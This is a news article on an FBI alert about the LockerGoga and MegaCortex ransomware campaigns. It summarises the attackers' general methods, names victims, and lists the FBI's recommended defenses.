FBI Issues Warning Following Spate of LockerGoga and MegaCortex Ransomware Attacks

The FBI has issued a TLP:Amber alert in response to a spate of cyberattacks involving the ransomware variants LockerGoga and MegaCortex. The threat actors using these ransomware variants have been targeting large enterprises and organizations and typically deploy the ransomware several months after a network has been compromised.

LockerGoga was first detected in January 2019 and MegaCortex ransomware first appeared in May 2019. Both ransomware variants exhibit similar IoCs and have similar C2 infrastructure and are both used in highly targeted attacks on large corporate networks.

LockerGoga was used in the ransomware attacks on the U.S. chemical companies Hexion and Momentive, the aluminum and energy company Norsk Hydro, and the engineering consulting firm, Altran Technologies. MegaCortex ransomware was used in the attacks on the accounting software firm Wolters Kluwer and the cloud hosting firm iNSYNQ, to name but a few. The threat actors are careful, methodical, and attempt to cause maximum damage to increase the probability that their victim’s will pay. The ransom demands are often of the order of hundreds of thousands of dollars or more.

The initial compromise is achieved through a variety of methods including the exploitation of unpatched vulnerabilities, phishing attacks, SQL injection, brute force tactics on RDP, and the use of stolen credentials. Once compromised, the attackers run batch files to stop processes and services used by security solutions to ensure their presence is not detected. The attackers move laterally to compromise as many devices as possible using a penetration testing tool named Cobalt Strike, living-of-the-land Windows binaries, and legitimate software tools such as Mimikatz. A beacon is added to each compromised device on the network, which is used to execute PowerShell scripts, escalate privileges, and spawn a new session to act as a listener on the victim’s system, according to the FBI warning, as reported by Bleeping Computer which obtained a copy of the alert.

In contrast to many other threat actors who deploy ransomware soon after a system is compromised, the threat actors behind these attacks often wait several months before the ransomware encryption routine is triggered. It is unclear what the threat actors do during that time, but it is likely the time is used to steal sensitive data. The ransomware is deployed in the final stage of the attack once all useful data has been obtained from the victims.

The advice offered by the FBI to improve defenses is standard for preventing ransomware and other cyberattacks. Cybersecurity best practices should be followed, including backing up data regularly; storing backup copies on non-networked devices; testing backups to ensure file recovery is possible; setting strong passwords; patching promptly; enabling multi-factor authentication, especially on admin accounts; ensuring RDP servers can only be accessed via a VPN; disabling SMBv1; and to scan for open ports and block them to prevent them from being accessible.

The FBI also recommends auditing the creation of new accounts and monitoring Active Directory for changes to authorized users; enabling PowerShell logging and monitoring for unusual commands, including the execution of Base64 encoded PowerShell; and ensuring only the latest version of PowerShell is installed.

Author: Steve Alder has many years of experience as a journalist, and comes from a background in market research. He is a specialist on legal and regulatory affairs, and has several years of experience writing about HIPAA. Steve holds a B.Sc. from the University of Liverpool.